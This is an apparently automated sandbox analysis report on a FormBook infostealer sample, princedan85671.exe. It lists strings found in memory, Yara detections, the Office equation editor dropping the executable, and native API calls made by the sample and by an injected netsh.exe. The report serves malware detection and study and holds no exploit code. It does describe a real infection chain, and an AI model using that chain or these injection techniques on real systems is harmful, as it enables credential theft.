Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000007.00000000.2193421871.00000000039F4000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: explorer.exe, 00000007.00000000.2193421871.00000000039F4000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehpe2
Source: explorer.exe, 00000007.00000000.2193421871.00000000039F4000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
Source: explorer.exe, 00000007.00000000.2193421871.00000000039F4000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/de-de/?ocid=iehpL
Source: explorer.exe, 00000007.00000000.2193639072.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp String found in binary or memory: http://www.opera.com0
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000007.00000000.2193421871.00000000039F4000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000007.00000000.2203531250.0000000008632000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2193639072.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://z.about.com/m/a08.ico
Source: explorer.exe, 00000007.00000000.2194586401.00000000041AD000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
Source: explorer.exe, 00000007.00000000.2194586401.00000000041AD000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
Source: explorer.exe, 00000007.00000000.2203143383.000000000842E000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp String found in binary or memory: https://www.digicert.com/CPS0

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 6.2.princedan85671.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.princedan85671.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2345133773.0000000000260000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2223580519.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2182627662.0000000003596000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2182570687.00000000034FC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2344959311.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2223311731.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2223524102.00000000002D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2344652337.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2182506194.0000000003459000.00000004.00000001.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 6.2.princedan85671.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.princedan85671.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.princedan85671.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.princedan85671.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2345133773.0000000000260000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2345133773.0000000000260000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2223580519.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2223580519.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2182627662.0000000003596000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2182627662.0000000003596000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2182570687.00000000034FC000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2182570687.00000000034FC000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2344959311.0000000000180000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2344959311.0000000000180000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2223311731.00000000000F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2223311731.00000000000F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2223524102.00000000002D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2223524102.00000000002D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2344652337.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2344652337.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2182506194.0000000003459000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2182506194.0000000003459000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\princedan85671.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\princedanx[1].exe Jump to dropped file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00419D60 NtCreateFile, 6_2_00419D60
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00419E10 NtReadFile, 6_2_00419E10
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00419E90 NtClose, 6_2_00419E90
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00419F40 NtAllocateVirtualMemory, 6_2_00419F40
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00419D5A NtCreateFile, 6_2_00419D5A
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00419DB2 NtCreateFile, 6_2_00419DB2
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00419E8A NtClose, 6_2_00419E8A
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009F00C4 NtCreateFile,LdrInitializeThunk, 6_2_009F00C4
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009F0048 NtProtectVirtualMemory,LdrInitializeThunk, 6_2_009F0048
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009F0078 NtResumeThread,LdrInitializeThunk, 6_2_009F0078
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EF9F0 NtClose,LdrInitializeThunk, 6_2_009EF9F0
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EF900 NtReadFile,LdrInitializeThunk, 6_2_009EF900
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EFAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 6_2_009EFAD0
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EFAE8 NtQueryInformationProcess,LdrInitializeThunk, 6_2_009EFAE8
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EFBB8 NtQueryInformationToken,LdrInitializeThunk, 6_2_009EFBB8
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EFB68 NtFreeVirtualMemory,LdrInitializeThunk, 6_2_009EFB68
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EFC90 NtUnmapViewOfSection,LdrInitializeThunk, 6_2_009EFC90
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EFC60 NtMapViewOfSection,LdrInitializeThunk, 6_2_009EFC60
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EFD8C NtDelayExecution,LdrInitializeThunk, 6_2_009EFD8C
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EFDC0 NtQuerySystemInformation,LdrInitializeThunk, 6_2_009EFDC0
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EFEA0 NtReadVirtualMemory,LdrInitializeThunk, 6_2_009EFEA0
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EFED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 6_2_009EFED0
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EFFB4 NtCreateSection,LdrInitializeThunk, 6_2_009EFFB4
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009F10D0 NtOpenProcessToken, 6_2_009F10D0
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009F0060 NtQuerySection, 6_2_009F0060
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009F01D4 NtSetValueKey, 6_2_009F01D4
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009F010C NtOpenDirectoryObject, 6_2_009F010C
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009F1148 NtOpenThread, 6_2_009F1148
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009F07AC NtCreateMutant, 6_2_009F07AC
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EF8CC NtWaitForSingleObject, 6_2_009EF8CC
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EF938 NtWriteFile, 6_2_009EF938
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009F1930 NtSetContextThread, 6_2_009F1930
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EFAB8 NtQueryValueKey, 6_2_009EFAB8
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EFA20 NtQueryInformationFile, 6_2_009EFA20
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EFA50 NtEnumerateValueKey, 6_2_009EFA50
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EFBE8 NtQueryVirtualMemory, 6_2_009EFBE8
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EFB50 NtCreateKey, 6_2_009EFB50
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EFC30 NtOpenProcess, 6_2_009EFC30
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EFC48 NtSetInformationFile, 6_2_009EFC48
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009F0C40 NtGetContextThread, 6_2_009F0C40
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009F1D80 NtSuspendThread, 6_2_009F1D80
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EFD5C NtEnumerateKey, 6_2_009EFD5C
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EFE24 NtWriteVirtualMemory, 6_2_009EFE24
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EFFFC NtCreateProcessEx, 6_2_009EFFFC
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009EFF34 NtQueueApcThread, 6_2_009EFF34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C900C4 NtCreateFile,LdrInitializeThunk, 8_2_00C900C4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C907AC NtCreateMutant,LdrInitializeThunk, 8_2_00C907AC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8F9F0 NtClose,LdrInitializeThunk, 8_2_00C8F9F0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8F900 NtReadFile,LdrInitializeThunk, 8_2_00C8F900
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8FAE8 NtQueryInformationProcess,LdrInitializeThunk, 8_2_00C8FAE8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8FBB8 NtQueryInformationToken,LdrInitializeThunk, 8_2_00C8FBB8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8FB50 NtCreateKey,LdrInitializeThunk, 8_2_00C8FB50
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8FB68 NtFreeVirtualMemory,LdrInitializeThunk, 8_2_00C8FB68
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8FC60 NtMapViewOfSection,LdrInitializeThunk, 8_2_00C8FC60
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8FDC0 NtQuerySystemInformation,LdrInitializeThunk, 8_2_00C8FDC0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8FD8C NtDelayExecution,LdrInitializeThunk, 8_2_00C8FD8C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 8_2_00C8FED0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8FFB4 NtCreateSection,LdrInitializeThunk, 8_2_00C8FFB4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C910D0 NtOpenProcessToken, 8_2_00C910D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C90048 NtProtectVirtualMemory, 8_2_00C90048
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C90060 NtQuerySection, 8_2_00C90060
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C90078 NtResumeThread, 8_2_00C90078
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C901D4 NtSetValueKey, 8_2_00C901D4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C91148 NtOpenThread, 8_2_00C91148
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C9010C NtOpenDirectoryObject, 8_2_00C9010C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8F8CC NtWaitForSingleObject, 8_2_00C8F8CC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8F938 NtWriteFile, 8_2_00C8F938
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C91930 NtSetContextThread, 8_2_00C91930
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8FAD0 NtAllocateVirtualMemory, 8_2_00C8FAD0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8FAB8 NtQueryValueKey, 8_2_00C8FAB8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8FA50 NtEnumerateValueKey, 8_2_00C8FA50
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8FA20 NtQueryInformationFile, 8_2_00C8FA20
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8FBE8 NtQueryVirtualMemory, 8_2_00C8FBE8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8FC90 NtUnmapViewOfSection, 8_2_00C8FC90
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8FC48 NtSetInformationFile, 8_2_00C8FC48
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C90C40 NtGetContextThread, 8_2_00C90C40
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8FC30 NtOpenProcess, 8_2_00C8FC30
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C91D80 NtSuspendThread, 8_2_00C91D80
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8FD5C NtEnumerateKey, 8_2_00C8FD5C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8FEA0 NtReadVirtualMemory, 8_2_00C8FEA0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8FE24 NtWriteVirtualMemory, 8_2_00C8FE24
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8FFFC NtCreateProcessEx, 8_2_00C8FFFC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8FF34 NtQueueApcThread, 8_2_00C8FF34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00099D60 NtCreateFile, 8_2_00099D60
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00099E10 NtReadFile, 8_2_00099E10
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00099E90 NtClose, 8_2_00099E90
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00099D5A NtCreateFile, 8_2_00099D5A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00099DB2 NtCreateFile, 8_2_00099DB2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00099E8A NtClose, 8_2_00099E8A
Detected potential crypto function
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Code function: 4_2_001DA290 4_2_001DA290
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Code function: 4_2_001D1F18 4_2_001D1F18
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Code function: 4_2_001D1F28 4_2_001D1F28
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Code function: 4_2_006958C0 4_2_006958C0
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Code function: 4_2_0069845F 4_2_0069845F
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Code function: 4_2_006984E5 4_2_006984E5
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Code function: 4_2_0069852B 4_2_0069852B
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_0041E004 6_2_0041E004
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00401027 6_2_00401027
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00401030 6_2_00401030
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_0041D0C1 6_2_0041D0C1
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_0041D3B9 6_2_0041D3B9
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00402D87 6_2_00402D87
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00402D90 6_2_00402D90
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00409E40 6_2_00409E40
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00402FB0 6_2_00402FB0
